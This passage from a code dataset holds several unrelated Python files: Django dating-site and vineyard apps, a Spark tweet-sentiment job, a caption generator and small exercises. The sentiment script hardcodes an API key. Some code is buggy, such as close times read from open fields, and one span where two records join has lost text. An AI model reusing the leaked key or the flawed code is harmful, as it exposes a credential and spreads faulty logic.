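    "time_to_get_response", "total_time_active", "http_status", "bytes_count",
    "concurrent_connections_haproxy", "concurrent_connections_frontend",
    "concurrent_connections_backend", "concurrent_active_connections_on_server",
    "connection_retry_attempts", "queue1", "queue2",
    "http_verb", "http_path", "http_protocol",
)

def groups_to_document(groups):
    return dict(zip(HAPROXY_FIELDS, groups))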
UserRegistrationForm(request.POST)\n if user_form.is_valid():\n # Create a new user object but avoid saving it yet\n new_user = user_form.save(commit=False)\n # Set the chosen password\n new_user.set_password(\n user_form.cleaned_data['password'])\n # Save the User object\n new_user.save()\n # Create the user profile\n profile = Profile.objects.create(user=new_user)\n return render(request,\n 'account/register_done.html',\n {'new_user': new_user})\n else:\n user_form = UserRegistrationForm()\n return render(request,\n 'account/register.html',\n {'user_form': user_form})\n\ndef viewprofile(request,pk=None):\n if pk :\n profile = Profile.objects.get(pk=pk)\n\n else:\n if request.user.is_authenticated:\n profile = Profile.objects.get(user=request.user)\n\n username = profile.user.username\n user = profile.user\n G = getgender(profile.gender)\n EDU = geteducation(profile.education)\n L= getlocation(profile.location)\n OC = getonlychild(profile.only_child)\n if profile.user.id % 10 != 0:\n if profile.gender == \"M\":\n l4 = \"Woman\"\n else:\n l4 = \"Man\"\n else:\n if profile.gender == \"M\":\n l4 = \"Man\"\n else:\n l4 = \"Woman\"\n\n if profile.intro == \"\":\n if profile.gender == \"M\":\n intro = \"He haven't write anything yet. ╥﹏╥\"\n elif profile.gender == \"F\":\n intro = \"She haven't write anything yet. ╥﹏╥\"\n else:\n intro = \"He/She haven't write anything yet. ╥﹏╥\"\n else:\n intro = profile.intro\n\n ufeature = userfeature.objects.get(user = request.user)\n lmusic = ufeature.musicloved.all()\n hmusic = ufeature.musichated.all()\n lmovie = ufeature.movieloved.all()\n hmovie = ufeature.moviehated.all()\n hobbies = ufeature.hobbies.all()\n\n\n\n\n\n data = {'profile':profile,'pk':pk,'username':username,'G':G,'EDU':EDU,\"L\":L,\"onlychild\":OC,\"l4\":l4,\"intro\":intro}\n\n data[\"ufeature\"] = ufeature\n data[\"lmusic\"] = lmusic\n data[\"hmusic\"] =hmusic\n data[\"lmovie\"] = lmovie\n data[\"hobbies\"] = hobbies\n\n\n # user_feature = userfeature.objects.get(user=profile.user)\n return render(request,'account/profile.html', data)\n\n\n\n\ndef viewprofilewithname(request,username=None):\n if username:\n user = User.objects.get(username=username)\n # user_feature = userfeature.objects.get(user=user)\n profile = Profile.objects.get(user=user)\n\n else:\n if request.user.is_authenticated:\n profile = Profile.objects.get(user=request.user)\n # user_feature = userfeature.objects.get(user=request.user)\n\n pk = profile.pk\n\n G = getgender(profile.gender)\n EDU = geteducation(profile.education)\n L= getlocation(profile.location)\n OC = getonlychild(profile.only_child)\n if profile.user.id % 10 != 0:\n if profile.gender == \"M\":\n l4 = \"Woman\"\n else:\n l4 = \"Man\"\n else:\n if profile.gender == \"M\":\n l4 = \"Man\"\n else:\n l4 = \"Woman\"\n\n if profile.intro == \"\":\n if profile.gender == \"M\":\n intro = \"He haven't write anything yet. ╥﹏╥\"\n elif profile.gender == \"F\":\n intro = \"She haven't write anything yet. ╥﹏╥\"\n else:\n intro = \"He/She haven't write anything yet. 
╥﹏╥\"\n else:\n intro = profile.intro\n\n ufeature = userfeature.objects.get(user = request.user)\n lmusic = ufeature.musicloved.all()\n hmusic = ufeature.musichated.all()\n lmovie = ufeature.movieloved.all()\n hmovie = ufeature.moviehated.all()\n hobbies = ufeature.hobbies.all()\n\n\n\n\n\n data = {'profile':profile,'pk':pk,'username':username,'G':G,'EDU':EDU,\"L\":L,\"onlychild\":OC,\"l4\":l4,\"intro\":intro}\n\n data[\"ufeature\"] = ufeature\n data[\"lmusic\"] = lmusic\n data[\"hmusic\"] =hmusic\n data[\"lmovie\"] = lmovie\n data[\"hobbies\"] = hobbies\n\n return render(request,'account/profile.html', data)\n# def viewprofile(request,username=None):\n# ctx = {'username':username}\n# if request.method == 'POST':\n# if username:\n# profile = Profile.objects.get(username=username)\n# else:\n# if request.user.is_authenticated:\n# profile = Profile.objects.get(user=request.user)\n#\n# return render(request,'account/profile.html', {'profile':profile},ctx)\n\n\n@login_required\ndef edit(request):\n\n profile = Profile.objects.get(user=request.user)\n user_feature = userfeature.objects.get(user=request.user)\n lmusic = user_feature.musicloved.all()\n hmusic = user_feature.musichated.all()\n lmovie = user_feature.movieloved.all()\n hmovie = user_feature.moviehated.all()\n lhobbies = user_feature.hobbies.all()\n\n\n if request.method == 'POST':\n user_form = UserEditForm(instance=request.user,\n data=request.POST)\n profile_form = ProfileEditForm(instance = profile,\n data=request.POST,\n files=request.FILES)\n\n userfeature_form =UserFeatureEditForm(instance = user_feature,\n data=request.POST,\n files=request.FILES)\n if user_form.is_valid():\n user_form.save()\n else:\n messages.error(request, 'Error updating your profile')\n\n if profile_form.is_valid():\n profile_form.save()\n else:\n messages.error(request, 'Error updating your profile')\n\n if userfeature_form.is_valid():\n userfeature_form.save()\n else:\n messages.error(request, 'Error updating your profile')\n\n\n messages.success(request, 'Profile updated '\\\n 'successfully')\n\n else:\n user_form = UserEditForm(instance=request.user)\n profile_form = ProfileEditForm(instance=profile)\n userfeature_form =UserFeatureEditForm(instance = user_feature)\n\n data = {'user_form': user_form,'profile_form': profile_form,'userfeature_form':userfeature_form,'profile':profile,\"ufeature\":user_feature}\n\n data[\"lmusic\"] = lmusic\n data[\"hmusic\"] =hmusic\n data[\"lmovie\"] = lmovie\n data[\"lhobbies\"] = lhobbies\n\n data[\"music\"] = music.objects.all()\n data[\"movie\"] = movie.objects.all()\n data[\"hobbies\"] = hobbies.objects.all()\n\n return render(request,\n 'account/edit.html',\n data)\n\ndef index(request):\n data ={}\n data['profile']= Profile.objects.all().reverse()[:10]\n return render(request, 'index-2.html',data)\n","sub_path":"dating/account/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"491189043","text":"from django.db import models\nfrom django.conf import settings\nfrom django.contrib.auth.models import User\nfrom binascii import b2a_hex\nfrom os import urandom\n\ndef build_uid():\n return unicode('vineyard' + b2a_hex(urandom(5)))\n\nclass Vineyard(models.Model):\n user = models.ForeignKey(User)\n vineyard_id = models.CharField(max_length=20, editable=False,\n default=build_uid)\n name = models.CharField(max_length=500, blank=True)\n owner = models.CharField(max_length=500, blank=True)\n street 
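# (Editor's note) viewprofile() and viewprofilewithname() above duplicate the whole
# context-building block (gender/education/location lookups plus the userfeature
# queries); a sketch of factoring it into one helper reused by both views (helper
# name is illustrative; model and field names are from the snippet):
def build_profile_context(request, profile):
    data = {
        "profile": profile, "pk": profile.pk,
        "G": getgender(profile.gender), "EDU": geteducation(profile.education),
        "L": getlocation(profile.location),
        "onlychild": getonlychild(profile.only_child),
    }
    ufeature = userfeature.objects.get(user=request.user)
    data.update(ufeature=ufeature, lmusic=ufeature.musicloved.all(),
                hmusic=ufeature.musichated.all(), lmovie=ufeature.movieloved.all(),
                hobbies=ufeature.hobbies.all())
    return data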
= models.CharField(max_length=1000, blank=True)\n county = models.CharField(max_length=100, blank=True)\n zipcode = models.IntegerField(blank=True, null=True)\n email = models.EmailField(max_length=200, blank=True)\n phone = models.CharField(max_length=12, blank=True)\n description = models.TextField(max_length=350, blank=True)\n established = models.DateField(blank=True, null=True)\n website = models.URLField(max_length=300, blank=True)\n latitude = models.DecimalField(max_digits=10,\n decimal_places=7, blank=True, null=True)\n longitude = models.DecimalField(max_digits=10,\n decimal_places=7, blank=True, null=True)\n sunday_open = models.TimeField(blank=True, null=True)\n sunday_close = models.TimeField(blank=True, null=True)\n monday_open = models.TimeField(blank=True, null=True)\n monday_close = models.TimeField(blank=True, null=True)\n tuesday_open = models.TimeField(blank=True, null=True)\n tuesday_close = models.TimeField(blank=True, null=True)\n wednesday_open = models.TimeField(blank=True, null=True)\n wednesday_close = models.TimeField(blank=True, null=True)\n thursday_open = models.TimeField(blank=True, null=True)\n thursday_close = models.TimeField(blank=True, null=True)\n friday_open = models.TimeField(blank=True, null=True)\n friday_close = models.TimeField(blank=True, null=True)\n saturday_open = models.TimeField(blank=True, null=True)\n saturday_close = models.TimeField(blank=True, null=True)\n vineyard = models.BooleanField(default=False)\n tasting_room = models.BooleanField(default=False)\n winery = models.BooleanField(default=False)\n image = models.ImageField(upload_to=settings.MEDIA_ROOT,\n height_field=None, width_field=None, max_length=1000,\n blank=True, null=True)\n\n def vineyards_serialized(self, model=None):\n if model is None:\n model = self\n json = {\n 'name': model.name,\n 'owner': model.owner,\n 'address' : {\n 'street': model.street,\n 'county': model.county,\n 'zipcode': model.zipcode,\n },\n 'email': model.email,\n 'phone': model.phone,\n 'description': model.description,\n 'established': model.established,\n 'website': model.website,\n 'geo': {\n 'lat': model.latitude,\n 'lng': model.longitude,\n },\n 'hours': {\n 'sunday': {'open': model.sunday_open,\n 'close': model.sunday_open},\n 'monday': {'open': model.monday_open,\n 'close': model.monday_open},\n 'tuesday': {'open': model.tuesday_open,\n 'close': model.tuesday_open},\n 'wednesday': {'open': model.wednesday_open,\n 'close': model.wednesday_open},\n 'thursday': {'open': model.thursday_open,\n 'close': model.thursday_open},\n 'friday': {'open': model.friday_open,\n 'close': model.friday_open},\n 'saturday': {'open': model.saturday_open,\n 'close': model.saturday_open},\n },\n 'type': {\n 'vineyard': model.vineyard,\n 'tasting_room': model.tasting_room,\n 'winery': model.winery\n },\n# 'image': model.image,\n 'services': model.get_services(model.pk),\n 'products': model.get_products(model.pk),\n }\n return json\n\n def get_services(self, id):\n try:\n service_list = []\n services = Service.objects.filter(product_id=id)\n for s in services:\n select = {\n 'service': s.service,\n 'description': s.description\n }\n service_list.append(select)\n return service_list\n except:\n return 'undefined'\n\n def get_products(self, id):\n try:\n product_list = []\n products = Product.objects.filter(product_id=id)\n for p in products:\n select = {\n 'product': p.product,\n 'description': p.description\n }\n product_list.append(select)\n return product_list\n except:\n return 'undefined'\n\nclass 
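# (Editor's note) In vineyards_serialized above, every 'close' entry reads the
# *_open field (e.g. 'close': model.sunday_open), so closing times are never
# serialized. A getattr-based sketch that fixes this and collapses the fourteen
# near-identical TimeField lookups (helper name is illustrative):
DAYS = ("sunday", "monday", "tuesday", "wednesday", "thursday", "friday", "saturday")

def hours_dict(model):
    return {day: {"open": getattr(model, day + "_open"),
                  "close": getattr(model, day + "_close")}
            for day in DAYS}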
Service(models.Model):\n vineyard_fk = models.ForeignKey(Vineyard)\n service = models.CharField(max_length=500, blank=True)\n description= models.TextField(blank=True)\n\nclass Product(models.Model):\n vineyard_fk = models.ForeignKey(Vineyard)\n product = models.CharField(max_length=100, blank=True)\n description = models.TextField(max_length=100, blank=True)\n\nclass UserProfile(models.Model):\n user = models.OneToOneField(User)\n\n def __unicode__(self):\n return self.user.username","sub_path":"azwine/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":5510,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"653329486","text":"from pyspark import SparkConf, SparkContext\nfrom pyspark.streaming import StreamingContext\nfrom pyspark.sql import SparkSession\nfrom pyspark.sql.types import *\nfrom pyspark.sql.functions import *\nimport requests as re\nimport statistics as stats\nimport argparse\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"action\", choices=['console', 'topic'])\nargs = parser.parse_args()\n\n\n# ------ HELPER FUNCTIONS -------\n\n\ndef get_content(tweet):\n \"\"\"\n Extract the company out of the tweet\n \"\"\"\n\n tesla = [\"Tesla\", \"tesla\", \"tsla\", \"TSLA\", \"#tsla\", \"#TSLA\"]\n apple = [\"Apple\", \"apple\", \"aapl\", \"AAPL\", \"#aapl\", \"#AAPL\"]\n google = [\"Google\", \"google\", \"googl\", \"GOOGL\", \"#googl\", \"#GOOGL\"]\n bayer = [\"Bayer\", \"bayer\", \"bayn\", \"BAYN\", \"#bayn\", \"#BAYN\"]\n bitcoin = [\"Bitcoin\", \"bitcoin\"]\n \n if any(map(tweet.__contains__, tesla)):\n return \"tesla\"\n elif any(map(tweet.__contains__, apple)):\n return \"apple\"\n elif any(map(tweet.__contains__, google)):\n return \"google\"\n elif any(map(tweet.__contains__, bayer)):\n return \"bayer\"\n elif any(map(tweet.__contains__, bitcoin)):\n return \"bitcoin\"\n else:\n return \"-\"\n \n\n# Create UDF\nget_content_udf = udf(get_content, StringType())\n\n\ndef get_sentiment(tweet):\n \"\"\"\n Helper function that extracts the sentiment of each tweet\n 1 = positive\n 0 = negative \n \"\"\"\n\n # Do the API request (Stanford Sentiment)\n r = re.post(\n \"https://api.deepai.org/api/sentiment-analysis\",\n data={\n 'text': tweet,\n },\n headers={'api-key': 'ca26882d-52af-4903-b0f7-571801ebd67a'}\n )\n\n # Get only the output array. 
Each sentence has its own sentiments\n result = r.json()[\"output\"]\n\n # Map strings to integers helper function\n def classify(sentiment):\n sentiment = sentiment.lower()\n if sentiment == \"verynegative\":\n return -2\n elif sentiment == \"negative\":\n return -1\n elif sentiment == \"positive\":\n return 1\n elif sentiment == \"verypositive\":\n return 2\n else:\n return 0\n\n # Map strings to integers helper function\n result = list( map(classify, result))\n\n # Calculate the entire\n result = stats.mean(result)\n \n return 1 if result >= 0 else 0\n\n# Create UDF\nget_sentiment_udf = udf(get_sentiment, StringType())\n\n\n# ------ SPARK PROCESS -------\n\nspark = SparkSession.builder\\\n .appName('Tweet Sentiment Analysis: Influencers')\\\n .getOrCreate()\n\nspark.sparkContext.setLogLevel(\"ERROR\")\n\n# Create the schema for input data\nschema = StructType([ \\\n StructField(\"text\", StringType(), True),\n StructField(\"created_at\", StringType(), True) \\\n ])\n\n# Get the stream\nraw_input = spark \\\n .readStream \\\n .format(\"kafka\") \\\n .option(\"kafka.bootstrap.servers\", \"localhost:9092\") \\\n .option(\"subscribe\", \"twitterPublic\") \\\n .option(\"startingOffsets\", \"latest\") \\\n .option(\"failOnDataLoss\", \"false\") \\\n .load()\n\n# Transform byte code to string\nraw_input = raw_input.selectExpr(\"CAST(value AS STRING)\")\n\n# Check if the stream is running\nprint(\"Are we streaming? \" + str(raw_input.isStreaming))\n\n# print schema of the raw input\nprint(\"Data Schema: raw_input\")\nraw_input.printSchema()\n\n# Transform value information to a column\ntweets = raw_input.select(from_json(raw_input.value, schema).alias(\"tweet\"))\n\n#Select only the text and insert process time\ntweets = tweets.select(col(\"tweet.text\").alias(\"tweet\"),).withColumn(\"process_time\", current_timestamp())\n\n# print schema of the new structured stream\nprint(\"Data Schema tweets:\")\ntweets.printSchema()\n\n# Extract the content of the tweet\ntweets = tweets.withColumn(\"company\", get_content_udf(col(\"tweet\")))\n\n# Filter not interesting tweets\ntweets = tweets.filter(~(tweets.company == \"-\"))\n\n# ADD SENTIMENT\n# Positive\ntweets = tweets.withColumn(\"sentiment_positive\",get_sentiment_udf(col(\"tweet\")))\n# Add additional negative for easier count\ntweets = tweets.withColumn(\"sentiment_negative\", 1 - col(\"sentiment_positive\"))\n\n\n# Specify windowing\nwindow_length = \"10 seconds\"\n# sliding_interval = \"0 seconds\"\n\n# Aggreagte tweets\ntweets_aggregated = tweets \\\n .withWatermark(\"process_time\", window_length).groupBy(\n window(tweets.process_time, window_length),\n tweets.company\n ).agg( \\\n sum(\"sentiment_positive\").alias(\"sentiment_positive\"),\n sum(\"sentiment_negative\").alias(\"sentiment_negative\"),\n count(lit(1)).alias(\"tweet_count\")\n )\n\n# Create fraction for sentiments and add timestamp\ntweets_aggregated = tweets_aggregated.withColumn(\"sentiment_positive\", col(\"sentiment_positive\") / col(\"tweet_count\")) \\\n .withColumn(\"sentiment_negative\", col(\"sentiment_negative\") / col(\"tweet_count\")) \\\n .withColumn(\"time\", current_timestamp())\n\n\n# Define output\ntweets_aggregated = tweets_aggregated.select( \\\n col(\"company\"),\n col(\"sentiment_positive\"),\n col(\"sentiment_negative\"),\n col(\"tweet_count\"),\n col(\"time\")\n)\n\n# Start running the query that prints the running counts to the console\n# use append for non aggregated data\n# use complete for aggregation\n# used update for only last aggregate\n\nif 
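# (Editor's note) get_sentiment above returns an int but both UDFs are registered
# with StringType(), forcing Spark to cast before "1 - col('sentiment_positive')";
# declaring the real return type avoids that. A sketch over the label array the API
# returns (the label map mirrors classify() in the snippet; names are illustrative):
import statistics as stats
from pyspark.sql.functions import udf
from pyspark.sql.types import IntegerType

LABELS = {"verynegative": -2, "negative": -1, "positive": 1, "verypositive": 2}

def sentiment_flag(labels):
    score = stats.mean(LABELS.get(l.lower(), 0) for l in labels)
    return 1 if score >= 0 else 0

sentiment_flag_udf = udf(sentiment_flag, IntegerType())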
args.action == \"console\":\n output = tweets_aggregated \\\n .writeStream \\\n .outputMode(\"update\") \\\n .format(\"console\") \\\n .start()\n\nelif args.action == \"topic\": \n output = tweets_aggregated \\\n .selectExpr(\"to_json(struct(*)) AS value\") \\\n .writeStream \\\n .outputMode(\"update\") \\\n .format(\"kafka\") \\\n .option(\"kafka.bootstrap.servers\", \"localhost:9092\") \\\n .option(\"topic\", \"twitterPublicOutput\") \\\n .option(\"checkpointLocation\", \"/tmp/steffen/checkpoint\") \\\n .start()\n\n\n\noutput.awaitTermination()\n\n\n# spark-submit --packages org.apache.spark:spark-sql-kafka-0-10_2.12:3.1.1 spark_public_opinion.py console","sub_path":"spark_public_opinion.py","file_name":"spark_public_opinion.py","file_ext":"py","file_size_in_byte":5681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"32680432","text":"from random import choice\nfrom shapeworld import util\nfrom shapeworld.captions import Quantifier\nfrom shapeworld.captioners import WorldCaptioner\n\n\nclass QuantifierCaptioner(WorldCaptioner):\n\n # incorrect modes\n # 0: correct\n # 1: incorrect restrictor\n # 2: incorrect body\n # 3: incorrect quantifier\n\n zero_quantifiers = {('count', 'lt', 0), ('count', 'leq', 0), ('count', 'eq', 0), ('count', 'eq-all', 0), ('count', 'lt', 1), ('ratio', 'lt', 0.0), ('ratio', 'leq', 0.0), ('ratio', 'eq', 0.0)}\n\n def __init__(self, restrictor_captioner, body_captioner, quantifiers=None, incorrect_distribution=None, pragmatical_redundancy_rate=None, pragmatical_tautology_rate=None, logical_redundancy_rate=None, logical_tautology_rate=None, logical_contradiction_rate=None):\n super(QuantifierCaptioner, self).__init__(\n internal_captioners=(restrictor_captioner, body_captioner),\n pragmatical_redundancy_rate=pragmatical_redundancy_rate,\n pragmatical_tautology_rate=pragmatical_tautology_rate,\n logical_redundancy_rate=logical_redundancy_rate,\n logical_tautology_rate=logical_tautology_rate,\n logical_contradiction_rate=logical_contradiction_rate\n )\n\n self.restrictor_captioner = restrictor_captioner\n self.body_captioner = body_captioner\n self.quantifiers = quantifiers\n self.incorrect_distribution = util.cumulative_distribution(util.value_or_default(incorrect_distribution, [1, 1, 2]))\n\n def set_realizer(self, realizer):\n if not super(QuantifierCaptioner, self).set_realizer(realizer):\n return False\n\n if self.quantifiers is None:\n self.quantifiers = [(qtype, qrange, quantity) for qtype, qranges in realizer.quantifiers.items() for qrange, quantities in qranges.items() for quantity in quantities]\n else:\n self.quantifiers = [(qtype, qrange, quantity) for qtype, qranges in realizer.quantifiers.items() if qtype in self.quantifiers for qrange, quantities in qranges.items() for quantity in quantities]\n\n return True\n\n def rpn_length(self):\n return self.restrictor_captioner.rpn_length() + self.body_captioner.rpn_length() + 1\n\n def rpn_symbols(self):\n return super(QuantifierCaptioner, self).rpn_symbols() | {'{}-{}-{}-{}'.format(Quantifier.__name__, *quantifier) for quantifier in self.quantifiers}\n\n def sample_values(self, mode, correct, predication):\n assert predication.empty()\n\n if not super(QuantifierCaptioner, self).sample_values(mode=mode, correct=correct, predication=predication):\n return False\n\n self.incorrect_mode = 0 if correct else 1 + util.sample(self.incorrect_distribution)\n\n self.qtype, self.qrange, self.quantity = choice(self.quantifiers)\n\n predication = predication.copy()\n\n 
if not self.restrictor_captioner.sample_values(mode=mode, correct=(self.incorrect_mode != 1), predication=predication): # 1: incorrect restrictor\n return False\n\n if (self.qtype, self.qrange, self.quantity) in QuantifierCaptioner.zero_quantifiers:\n # always incorrect body for zero quantification, since we need an incorrect body for a correct caption\n if not self.body_captioner.sample_values(mode=mode, correct=False, predication=predication): # 2: incorrect body\n return False\n\n else:\n if not self.body_captioner.sample_values(mode=mode, correct=(self.incorrect_mode != 2), predication=predication): # 2: incorrect body\n return False\n\n if self.incorrect_mode == 3: # 3: incorrect quantifier\n self.incorrect_quantifiers = [(qtype, qrange, quantity) for qtype, qrange, quantity in self.quantifiers if qtype != self.qtype or qrange != self.qrange or quantity != self.quantity]\n\n return True\n\n def model(self):\n return util.merge_dicts(\n dict1=super(QuantifierCaptioner, self).model(),\n dict2=dict(\n qtype=self.qtype,\n qrange=self.qrange,\n quantity=self.quantity,\n incorrect_mode=self.incorrect_mode,\n restrictor_captioner=self.restrictor_captioner.model(),\n body_captioner=self.body_captioner.model()\n )\n )\n\n def caption(self, predication, world):\n assert predication.empty()\n\n rstr_predication = predication.sub_predication()\n rstr_body_predication = predication.sub_predication()\n body_predication = predication.sub_predication()\n\n if (self.qtype, self.qrange, self.quantity) in QuantifierCaptioner.zero_quantifiers:\n # special case: zero quantifier, hence incorrect body\n rstr_body_predication_copy = rstr_body_predication.copy()\n body = self.body_captioner.caption(predication=rstr_body_predication_copy, world=world)\n if body is None:\n return None\n if not self.body_captioner.incorrect(caption=body, predication=rstr_body_predication, world=world):\n return None\n\n restrictor = self.restrictor_captioner.caption(predication=rstr_body_predication_copy, world=world)\n if restrictor is None:\n return None\n self.restrictor_captioner.apply_caption_to_predication(caption=restrictor, predication=rstr_body_predication)\n\n else:\n body = self.body_captioner.caption(predication=rstr_body_predication, world=world)\n if body is None:\n return None\n\n restrictor = self.restrictor_captioner.caption(predication=rstr_body_predication, world=world)\n if restrictor is None:\n return None\n\n self.restrictor_captioner.apply_caption_to_predication(caption=restrictor, predication=rstr_predication)\n self.body_captioner.apply_caption_to_predication(caption=body, predication=body_predication)\n\n if not self.pragmatical_tautology and rstr_predication.equals(other=body_predication):\n return None\n\n return Quantifier(qtype=self.qtype, qrange=self.qrange, quantity=self.quantity, restrictor=restrictor, body=body)\n\n def incorrect(self, caption, predication, world):\n assert predication.empty()\n\n if self.incorrect_mode == 0: # 0: correct\n rstr_predication, body_predication = self.apply_caption_to_predication(caption=caption, predication=predication)\n\n elif self.incorrect_mode == 1: # 1: incorrect restrictor\n rstr_predication = predication.sub_predication()\n if not self.restrictor_captioner.incorrect(caption=caption.restrictor, predication=rstr_predication, world=world):\n return False\n rstr_body_predication = predication.sub_predication(predication=rstr_predication.copy())\n self.body_captioner.apply_caption_to_predication(caption=caption.body, predication=rstr_body_predication)\n 
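# (Editor's note, hedged) sample_values above draws incorrect_mode via
# util.sample(self.incorrect_distribution) over a cumulative distribution; the usual
# implementation of that primitive is a bisect over the running totals (a sketch of
# the assumed pattern, not shapeworld's actual util code):
import random
from bisect import bisect_right

def sample_cumulative(cumdist):
    """cumdist: non-decreasing running totals, e.g. [0.25, 0.5, 1.0] -> 0, 1 or 2."""
    return bisect_right(cumdist, random.random() * cumdist[-1])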
body_predication = predication.sub_predication()\n self.body_captioner.apply_caption_to_predication(caption=caption.body, predication=body_predication)\n\n elif self.incorrect_mode == 2: # 2: incorrect body\n rstr_predication = predication.sub_predication()\n self.restrictor_captioner.apply_caption_to_predication(caption=caption.restrictor, predication=rstr_predication)\n rstr_body_predication = predication.sub_predication(predication=rstr_predication.copy())\n if (self.qtype, self.qrange, self.quantity) in QuantifierCaptioner.zero_quantifiers:\n # special case: zero quantifier, hence correct body\n caption.body = self.body_captioner.caption(predication=rstr_body_predication, world=world)\n if caption.body is None:\n return False\n else:\n if not self.body_captioner.incorrect(caption=caption.body, predication=rstr_body_predication, world=world):\n return False\n body_predication = predication.sub_predication()\n self.body_captioner.apply_caption_to_predication(caption=caption.body, predication=body_predication)\n\n elif self.incorrect_mode == 3: # 3: incorrect quantifier\n rstr_predication, body_predication = self.apply_caption_to_predication(caption=caption, predication=predication)\n caption.qtype, caption.qrange, caption.quantity = choice(self.quantifiers)\n\n if not self.pragmatical_tautology and rstr_predication.equals(other=body_predication):\n return False\n\n return True\n\n def apply_caption_to_predication(self, caption, predication):\n rstr_predication = predication.sub_predication()\n self.restrictor_captioner.apply_caption_to_predication(caption=caption.restrictor, predication=rstr_predication)\n rstr_body_predication = predication.sub_predication(predication=rstr_predication.copy())\n self.body_captioner.apply_caption_to_predication(caption=caption.body, predication=rstr_body_predication)\n body_predication = predication.sub_predication()\n self.body_captioner.apply_caption_to_predication(caption=caption.body, predication=body_predication)\n return rstr_predication, body_predication\n","sub_path":"shapeworld/captioners/quantifier.py","file_name":"quantifier.py","file_ext":"py","file_size_in_byte":9278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"94110296","text":"from django.conf.urls import url\nfrom django.contrib import admin\nfrom .views import homeView,loginView,signupView,profil,logoutView\n\n\nurlpatterns = [\n url(r'^profil/$', profil, name='profil'),\n url(r'^logout/$', logoutView, name='logout'),\n url(r'^signup/$', signupView, name='signup'),\n url(r'^login/$', loginView, name='login'),\n url(r'^$', homeView, name='home'),\n url(r'^admin/', admin.site.urls),\n]\n","sub_path":"latihanLogin/mywebsite/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"114919814","text":"class Solution:\n def maxProfit(self, prices: 'List[int]') -> 'int':\n buy1,buy2,sell1,sell2=-sys.maxsize,-sys.maxsize,0,0\n for i in prices:\n if buy1<-i:\n buy1=-i\n \n if sell1 4 :\n for i in range(len(copia)) :\n m[i].pop(len(m[i])-1)\n m[i].pop(0)\n retirado += 2\n if len(m) == 4 :\n retirado += len(m[0])\n m.pop(0)\n elif len(m) > 4 :\n retirado += (len(m[0]) * 2)\n m.pop(len(m)-1)\n m.pop(0)\n return 
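# (Editor's note) The "maxProfit" record above is truncated: the text between
# "if sell1" and "4 :" was lost (taking the start of the following reduz_matriz
# snippet with it). For reference, the usual completion of this two-transaction
# state machine is (a reconstruction, not the recovered original):
import sys

def max_profit(prices):
    buy1 = buy2 = -sys.maxsize
    sell1 = sell2 = 0
    for p in prices:
        buy1 = max(buy1, -p)           # best cash position after the first buy
        sell1 = max(sell1, buy1 + p)   # ... after the first sell
        buy2 = max(buy2, sell1 - p)    # ... after the second buy
        sell2 = max(sell2, buy2 + p)   # ... after the second sell
    return sell2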
retirado\n","sub_path":"atividades/mini_testes/reduz_matriz/questao.py","file_name":"questao.py","file_ext":"py","file_size_in_byte":635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"391690322","text":"# -*- encoding: utf-8 -*-\n\n# Področje, na katerega lahko rišemo krogce.\n# S pritiskom na levi gumb narišemo krogec.\n\nfrom tkinter import *\n\nclass Krogci():\n def __init__(self, master):\n # Naredimo področje za risanje\n self.canvas = Canvas(master, width=300, height=300)\n self.canvas.pack()\n\n # Registiramo se za klike z levim gumbom na canvasu\n self.canvas.bind(\"\", self.narisi_krogec)\n\n def narisi_krogec(self, event):\n '''Nariši krogec, kjer trenutno stoji miška.'''\n self.canvas.create_oval(event.x-5, event.y-5, event.x+5, event.y+5)\n\n\n# Glavnemu oknu rečemo \"root\" (koren), ker so grafični elementi\n# organizirani v drevo, glavno okno pa je koren tega drevesa\n\n# Naredimo glavno okno\nroot = Tk()\n\naplikacija = Krogci(root)\n\n# Kontrolo prepustimo glavnemu oknu. Funkcija mainloop neha\n# delovati, ko okno zapremo.\nroot.mainloop()\n","sub_path":"01_Tkinter/demo5.py","file_name":"demo5.py","file_ext":"py","file_size_in_byte":907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"635141817","text":"from random import randint\nfrom mtmHelper import MtmHelper\n\nclass Codificador:\n '''Codifica e decodifica valores decimais baseados numa f(x) pré definida e suas variaçõess'''\n\n def __init__(self, nCoefsPolinomio, coefs = None):\n self.mtmHelper = MtmHelper()\n if not(coefs):\n self.coefs = [randint(0, 99) for i in range(nCoefsPolinomio)]\n else:\n self.coefs = coefs\n self.exp = list(range(nCoefsPolinomio))\n self.k = 1\n self.ultOp = \"deriv\"\n \n def f(self, x):\n '''f(x) = a*x**n + b*x**(n-1) + ... 
+ c*x**0'''\n y = 0\n for i in range(len(self.coefs)):\n y += (x ** self.exp[i])*self.coefs[i]\n return y\n\n def modificaPolinomio(self):\n def temZero(lista):\n return 0 in lista\n\n if (self.ultOp == \"deriv\" and sum(self.coefs) > (self.coefs[0] + self.coefs[1])) or not temZero(self.coefs):\n self.coefs = self.mtmHelper.derivaPol(self.coefs, self.exp)\n self.ultOp = \"deriv\"\n else:\n self.coefs = self.mtmHelper.integraPol(self.coefs, self.exp, self.k)\n self.k += 1\n self.ultOp = \"integr\"\n\n def tranfQuebradoEmTupla(self, inteiro, decimal):\n n = decimal\n while n - int(n) > 0:\n n *= 10\n return (int(inteiro), int(n))\n\n def codifica(self, valorUnicode):\n res = self.f(valorUnicode)\n self.modificaPolinomio()\n\n valorDecimail = res - int(res)\n if valorDecimail > 0:\n res = self.tranfQuebradoEmTupla(res, valorDecimail)\n \n return res\n\n def decodifica(self, valor):\n y = 0\n if type(valor) == tuple:\n parteDecimal = valor[1]\n while parteDecimal > 1:\n parteDecimal /= 10\n y = (valor[0] + parteDecimal)\n else:\n y = valor\n \n res = self.mtmHelper.raiz(lambda x: self.f(x) - y, 0, 300)\n\n intTeto = int(res) + 1\n intBase = int(res)\n if res - intBase < intTeto - res:\n res = intBase\n else:\n res = intTeto\n\n self.modificaPolinomio()\n return 